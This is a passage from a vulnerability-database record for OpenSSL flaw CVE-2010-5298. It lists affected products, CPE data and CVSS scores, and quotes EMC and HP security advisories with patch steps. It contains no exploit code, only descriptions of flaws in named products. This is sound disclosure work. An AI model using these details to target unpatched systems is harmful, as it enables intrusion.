"vendor": "hp", "version": "7.2.1" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "usg2000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.4.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "mcp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66000" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.92743" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75000" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69000" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8300" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "junos 12.2r8-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "oceanstor s5600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.7" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "jabber video for ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secblade fw family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "junos 12.1x44-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.2" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "junos os 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex connect client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "junos 10.4r15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "uacos c4.4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "elog v100r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "security module for cisco network registar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "p2 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1810v10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "junos 10.0s25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "softco v200r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.2" }, { "model": "s6900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "svn5500 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.2" }, { "model": "junos d10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "12.1x47" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "msr50 g2 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "junos 10.4r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "agent desktop for cisco unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.3r4-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "dsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "agile controller v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.1" }, { "model": "nip2000\u00265000 v100r002c10hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66020" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.4" }, { "model": "junos r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1" }, { "model": "oceanstor s5800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "css series content services switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "115000" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smc2.0 v100r002c01b017sp16", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace iad v300r001c07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "security network intrusion prevention system gx7412-05", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.0" }, { "model": "dynamic system analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "s7700\u0026s9700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "blackberry link", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "1.2" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.05" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "msr20-1x family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "real-time compression appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.9.107" }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "msr30-1x family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos 12.1x44-d32", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "4510g switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.2" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "physical access gateways", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "dsr-1000 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "s7700\u0026s9700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "dsr-1000n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "junos 12.1r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89410" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "isoc v200r001c01spc101", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.1" }, { "model": "documentum content server sp2 p16", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "oceanstor s2200t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace usm v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos os 12.3r7", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.1" } ], "sources": [ { "db": "BID", "id": "66801" }, { "db": "NVD", "id": "CVE-2010-5298" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.1g", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mariadb:mariadb:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.0.13", "versionStartIncluding": "10.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2010-5298" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127326" }, { "db": "PACKETSTORM", "id": "128001" } ], "trust": 0.5 }, "cve": "CVE-2010-5298", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "exploitabilityScore": 4.9, "impactScore": 4.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "exploitabilityScore": 4.9, "id": "CVE-2010-5298", "impactScore": 4.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2010-5298", "trust": 1.0, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2010-5298", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2010-5298" }, { "db": "NVD", "id": "CVE-2010-5298" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment. OpenSSL is prone to a remote memory-corruption vulnerability. \nAn attacker can exploit this issue to cause denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed. As long as all other products which SMH V7.3.3.1 for Linux\nx86 communicates with have been upgraded to the latest versions, it will not\nbe vulnerable to the exploits described in CVE-2014-0224. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nESA-2014-079: EMC Documentum Content Server Multiple Vulnerabilities \n\nEMC Identifier: ESA-2014-079\n\nCVE Identifier: See below for individual CVEs\n\nSeverity Rating: CVSS v2 Base Score: See below for individual CVSS score for each CVE\n\nAffected products: \n\\x95\tAll EMC Documentum Content Server versions of 7.1 prior to P07\n\\x95\tAll EMC Documentum Content Server versions of 7.0\n\\x95\tAll EMC Documentum Content Server versions of 6.7 SP2 prior to P16\n\\x95\tAll EMC Documentum Content Server versions of 6.7 SP1\n\\x95\tAll EMC Documentum Content Server versions prior to 6.7 SP1\n \nSummary: \nEMC Documentum Content Server contains fixes for multiple vulnerabilities which also include vulnerabilities disclosed by the OpenSSL project on June 5, 2014 in OpenSSL. \n\nDetails: \nEMC Documentum Content Server may be susceptible to the following vulnerabilities:\n\n\\x95\tArbitrary Code Execution (CVE-2014-4618):\nAuthenticated non-privileged users can potentially execute Documentum methods with higher level privileges (up to and including superuser privileges) due to improper authorization checks being performed on user-created system objects. \nCVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)\n\n\\x95\tDQL Injection (CVE-2014-2520):\nCertain DQL hints in EMC Documentum Content Server may be potentially exploited by an authenticated non-privileged malicious user to conduct DQL injection attacks and read the database contents. \nCVSS v2 Base Score: 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N)\n\n\\x95\tInformation Disclosure (CVE-2014-2521):\nAuthenticated non-privileged users are allowed to retrieve meta-data of unauthorized system objects due to improper authorization checks being performed on certain RPC commands in Content Server. \nCVSS v2 Base Score: 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N)\n\n\\x95\tMultiple OpenSSL vulnerabilities (See individual CVEs below and refer to NVD for each of their scores):\n\tSSL/TLS Man-in-the-middle (MITM) vulnerability (CVE-2014-0224)\n\tDTLS recursion flaw (CVE-2014-0221)\n\tDTLS invalid fragment vulnerability (CVE-2014-0195)\n\tSSL_MODE_RELEASE_BUFFERS NULL pointer deference (CVE-2014-0198)\n\tSSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298)\n\tAnonymous ECDH denial of service (CVE-2014-3470)\n\tFLUSH + RELOAD cache side-channel attack (CVE-2014-0076)\nFor more information about these vulnerabilities, please visit the original OpenSSL advisory https://www.openssl.org/news/secadv_20140605.txt \n\nResolution: \nThe following versions contain the resolution for these issues: \n\\x95\tEMC Documentum Content Server version 7.1 P07 and later\n\\x95\tEMC Documentum Content Server version 7.0: Hotfixes are available for Windows \u0026 Linux. Contact EMC Support to obtain them. For Solaris and AIX, contact EMC Support to open Hotfix requests. \n\\x95\tEMC Documentum Content Server version 6.7 SP2 P16 and later\n\\x95\tEMC Documentum Content Server version 6.7 SP1: Hotfixes are available for Windows \u0026 Linux. Contact EMC Support to obtain them. For Solaris and AIX, contact EMC Support to open Hotfix requests. \n\nEMC recommends all customers to upgrade to one of the above versions at the earliest opportunity. \n\nLink to remedies:\nRegistered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server\n\nFor Hotfix, contact EMC Support. \n\n\n\nRead and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. \n\nFor an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. \n\nEMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. \n\nRelease Date: 2014-08-08\nLast Updated: 2014-08-08\n\nPotential Security Impact: Remote denial of service (DoS), code execution,\nunauthorized access, disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP System\nManagement Homepage (SMH), HP Smart Update Manager (SUM), and HP Version\nControl Agent (VCA) running on Linux and Windows. These components of HP\nInsight Control server deployment could be exploited remotely resulting in\ndenial of service (DoS), code execution, unauthorized access, or disclosure\nof information. \n\nHP Insight Control server deployment packages HP System Management Homepage\n(SMH) and HP Version Control Agent (VCA), and HP Smart Update Manager (SUM)\nand deploys them through the following components. This bulletin provides the\ninformation needed to update the HP Insight Control server deployment\nsolution. \n\nInstall HP Management Agents for Windows x86/x64\nInstall HP Management Agents for RHEL 5 x64\nInstall HP Management Agents for RHEL 6 x64\nInstall HP Management Agents for SLES 10 x64\nInstall HP Management Agents for SLES 11 x64\nUpgrade Proliant Firmware\n\nReferences:\n\nCVE-2010-5298 Remote Denial of Service\nCVE-2014-0076 Unauthorized Disclosure of Information\nCVE-2014-0195 Remote Unauthorized Access\nCVE-2014-0198 Remote Denial of Service\nCVE-2014-0221 Remote Denial of Service (DoS)\nCVE-2014-0224 Remote Unauthorized Access or Disclosure of Information\nCVE-2014-3470 Remote Code Execution or Unauthorized Access\nSSRT101628\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2, v7.3.1\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0\nCVE-2014-0076 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0221 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-3470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following updates to v7.3.1 of HP Insight Control server\ndeployment to resolve this vulnerability. HP has provided manual update steps\nif a version upgrade is not possible; if users wish to remain at v7.1.2,\nv7.2.0, or v7.2.1. \n\nNote: It is important to check your current running version of HP Insight\nControl server deployment and to follow the correct steps listed below. For\nHP Insight Control server deployment v7.2.2, users must upgrade to v7.3.1 and\nfollow the steps below to remove the vulnerability. The vulnerability known\nas Heartbleed (CVE-2014-0160) was fixed in HP Insight Control server\ndeployment v7.3.1. That Security Bulletin with instructions on how to upgrade\nto v7.3.1 can be found here:\n\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\na-c04267749\n\nHP Insight Control server deployment users of v7.1.2, v7.2.0, v7.2.1 should\ntake the following steps to remove this vulnerability. \n\nDelete the files smhamd64-*.exe/smhx86-*.exe\" from Component Copy Location\nlisted in the following table, rows 1 and 2. \nDelete the files \"vcax86-*.exe/vcaamd64-*.exe from Component Copy Location\nlisted in the following table, rows 3 and 4. \nDelete the files hpsmh-7.*.rpm\" from Component Copy Location listed in row 5. \nIn sequence, perform the steps from left to right in the following table. \nFirst, download components from Download Link; Second, rename the component\nas suggested in Rename to. Third, copy the component to the location\nspecified in Component Copy Location. \nTable Row Number\n Download Link\n Rename to\n Component Copy Location\n\n1\n http://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba\n smhamd64-ccp023716.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n2\n http://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05\n smhx86-cp023715.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n3\n http://www.hp.com/swpublishing/MTX-8aefeaf490284a7691eca97d13\n vcax86-cp023742.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n4\n http://www.hp.com/swpublishing/MTX-c0d32bac154a4d93839d8cd1f2\n vcaamd64-cp023743.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n5\n http://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93\n Do not rename the downloaded component for this step. \n \\\\express\\hpfeatures\\hpagents-sles11-x64\\components\n\\\\express\\hpfeatures\\hpagents-sles10-x64\\components\n\\\\express\\hpfeatures\\hpagents-rhel5-x64\\components\n\\\\express\\hpfeatures\\hpagents-rhel6-x64\\components\n\nDownload and extract the HPSUM 5.3.6 component from\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p750586112/v99793\n\nCopy all content from extracted ZIP folder and paste into\n\\\\eXpress\\hpfeatures\\fw-proLiant\\components\nInitiate Install HP Management Agents for SLES 11 x64 on targets running\nSLES11 x64. \nInitiate Install HP Management Agents for SLES 10 x64 on targets running\nSLES10 x64. \nInitiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL\n6 x64. \nInitiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL\n5 x64. \nInitiate Install HP Management Agents for Windows x86/x64 on targets running\nWindows. \n\nHP Insight Control server deployment users with v7.2.2:\n\nPlease upgrade to 